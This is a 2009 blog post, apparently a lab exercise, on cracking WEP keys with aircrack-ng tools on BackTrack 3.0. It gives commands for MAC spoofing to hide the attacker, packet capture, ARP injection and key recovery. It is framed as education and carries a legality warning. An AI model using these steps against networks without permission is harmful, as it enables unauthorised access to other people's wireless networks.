Saturday, January 3, 2009

Lab4 Crack WEP using Blacktrack3.0 live CD

Lab Section:  Wireless Security

Lab Title: Crack WEP using Blacktrack3.0 live CD



1.       Understand how WEP works.

2.       Understand the method of cracking WEP

3.       Warning: It is illegal to crack other peoples’ wireless connection without their permission. this tutorial is for educational purposes only



1.       Check if your wireless card is supported by Blacktrack:

2.       Detect, sniff, inject wireless network

3.       Always can use “man [command]” to get the description of the command.



1.       airmon-ng: change the wireless card into monitor mode.

2.       ifconfig: configure a card

3.       iwconfig: configure a wireless card

4.       macchanger: change the mac address of a networking card

5.       airodump-ng: capture packets

6.       aireplay-ng: generate traffic by injecting ARP-request packets into a wireless network.

7.       commview for wifi: (optional) generate traffic.




1. Get the target AP’s information (BSSID, ESSID, channel etc.)

Open a terminal window.

# cd /tmp

# iwconfig                          

-- Show and get the wireless device name.

# airodump-ng [device]        

-- Once you get the information, press crtl+c to stop the capture, then copy and paste the target AP’s information to a notepad.


2. Change the wireless card’s MAC address

# macchanger –s rausb0

       -- Show the wireless card’s MAC address

# airmon-ng stop [device]

       -- turn wireless card into manage mode.

# ifconfig [device] down

       -- Turn off the wireless card; otherwise you can not change the MAC address.


# macchanger –a rausb0

-- Change the MAC of the wireless card to a faked MAC. An attacker always wants to hide himself. This is a necessary step for attack purpose.

# ifconfig [device] up

       -- Turn on the wireless card.


3. Change the wireless card into monitor mode

# airmon-ng start [device]

       -- Enable the monitor mode

# iwconfig

       -- Make sure the wireless card is in the Monitor mode.


4. Capture packets:

# airodump-ng –c [channel] –w [file name] –-bssid [AP’s bssid] --ivs [device]

-- To understand the parameter’s meaning, type “airodump --help” or “man airodump”. Leave this window opened


5. Associate the wireless card with the target AP:

Open a new terminal window

# aireplay-ng -1 0 -e [essid] -a [bssid] -h [wireless card’s MAC] [device]

  -- To understand the parameter’s meaning, type “aireplay --help” or “man aireplay”.


6. Generate traffics:

# aireplay-ng -3 –b [bssid] –h [wireless card’s MAC address] [device]

  -- To understand the parameter’s meaning, type “aireplay --help” or “man aireplay”. Leave this window opened. Additionally, you can use commview for wifi to generate traffics to increase the crack process.


7. Crack the password:

Open a new terminal window

# cd /tmp

# aircrack-ng –b [bssid] *.ivs



1.       For more information, please visit my blog

2.       Video demo is located in


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